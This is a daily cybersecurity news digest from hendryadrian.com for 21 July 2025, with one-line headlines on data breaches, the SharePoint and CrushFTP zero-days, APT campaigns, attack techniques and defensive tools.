Cybersecurity News | Daily Recap [21 Jul 2025]

hendryadrian.com

hendryadrian.com

Data Breaches & Ransomware

• Radiology Associates data breach exposed info of over 1.4 million people, with credit monitoring offered – Radiology Breach
• BianLian ransomware led to data breach at Alcohol & Drug Testing Service impacting 750,000 individuals – TADTS Breach
• Over 200,000 affected by healthcare-related data breaches at Cierant and Zumpano Patricios involving software vulnerabilities – Law Firm Breaches
• Luxury brands Dior and Louis Vuitton victims of data breach linked to ShinyHunters, with customer notifications underway – Dior Breach
• Dell confirms breach of test lab platform by the extortion group World Leaks targeting synthetic demo data – Dell Breach

Zero-Day Vulnerabilities

• Microsoft SharePoint servers are under active attack exploiting zero-day RCE flaws (CVE-2025-53770/71) used in “ToolShell” attacks with urgent patches released – SharePoint Patches, SharePoint Zero-Day
• CrushFTP servers suffer exploitation of a critical zero-day vulnerability (CVE-2025-54309) granting admin access to over 1,000 exposed instances – CrushFTP Exposure, CrushFTP Zero-Day
• HPE Instant On devices patched for critical hard-coded credentials and command injection vulnerabilities allowing remote admin access – HPE Vulnerabilities

APT & Espionage Campaigns

• Iranian APT MuddyWater deploys new Android variants of DCHSpy spyware targeting Middle East users with political lures amid Israel-Iran tensions – MuddyWater DCHSpy
• Russia-linked GRU releases malware “Authentic Antics” targeting Microsoft cloud email accounts amid UK sanctions on GRU units – Authentic Antics
• China-aligned APTs intensify cyber espionage attacks on Taiwan’s semiconductor industry through spearphishing and malware deployment – Taiwan Semiconductor Espionage
• South Asian APT group UNG0002 runs multi-stage cyber espionage campaigns targeting gaming, academia, and software sectors across Asia – UNG0002 Campaign
• EncryptHub targets Web3 developers using fake AI platforms to deploy info-stealing Fickle Stealer malware against crypto projects – EncryptHub Attack

Cybercrime & Attack Techniques

• Attackers hijacked over 3,500 websites using stealth JavaScript miners and WebSocket tactics for cryptojacking and Magecart credit card skimming – Crypto Mining Campaign
• The PoisonSeed attack abuses FIDO keys’ cross-device sign-in and QR phishing to bypass authentication and compromise accounts – PoisonSeed Attack
• Surveillance firm bypasses SS7 protections by manipulating TCAP messages to covertly track user locations, exposing mobile network vulnerabilities – SS7 Tracking
• CoinDCX suffers a cyberattack causing a $44 million loss, but confirms no user wallets were impacted – CoinDCX Attack

Cybersecurity Strategies & Tools

• By 2026, over 80% of organizations aim to adopt Zero Trust security models, leveraging AI for adaptive access and threat detection – AI in Zero Trust
• Japan’s National Police Agency releases free decryption tools for victims of Phobos and 8Base ransomware through international collaboration – Ransomware Decryption Tool
• Babbel offers AI-powered language learning covering 14 languages with interactive conversation lessons for flexible skill-building – Babbel AI Learning

Investigations & Incident Responses

• Poland investigates potential sabotage following temporary air traffic control outage amid concerns of Russian destabilization efforts – Poland ATC Investigation
• Recent ransomware and malware threats including KAWA4096, CrazyHunter, and multiple global RaaS platforms demonstrate rising geopolitical cyber tensions – Weekly Threat Recap

Cybersecurity News | Daily Recap – hendryadrian.com